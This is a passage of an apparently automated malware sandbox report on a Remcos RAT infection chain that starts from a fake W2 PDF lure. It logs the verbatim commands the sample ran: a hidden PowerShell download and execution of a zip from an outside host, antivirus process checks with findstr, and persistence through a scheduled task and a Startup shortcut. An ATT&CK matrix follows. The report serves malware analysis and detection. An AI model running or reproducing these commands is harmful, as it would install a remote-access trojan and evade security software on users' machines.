Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & echo url="c:\users\user\appdata\local\mediafusion technologies inc\cineblend.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & exit
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & echo url="c:\users\user\appdata\local\mediafusion technologies inc\cineblend.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & exit

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

36_2_00B914AE

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B91FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

36_2_00B91FB0

Source: Prostores.com, 0000001C.00000003.2038016379.0000000004045000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000000.2031312040.0000000000333000.00000002.00000001.01000000.0000000F.sdmp, CineBlend.scr, 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CineBlend.scr	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B50A08 cpuid

36_2_00B50A08

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B8E5F4 GetLocalTime,

36_2_00B8E5F4

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B8E652 GetUserNameW,

36_2_00B8E652

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B6BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

36_2_00B6BCD2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

15_2_00406831

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: CineBlend.scr	Binary or memory string: WIN_81
Source: CineBlend.scr	Binary or memory string: WIN_XP
Source: CineBlend.scr.28.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: CineBlend.scr	Binary or memory string: WIN_XPe
Source: CineBlend.scr	Binary or memory string: WIN_VISTA
Source: CineBlend.scr	Binary or memory string: WIN_7
Source: CineBlend.scr	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-LOARC0

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BB2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	36_2_00BB2263
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BB1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	36_2_00BB1C61
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00652263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	38_2_00652263
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00651C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	38_2_00651C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	28 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
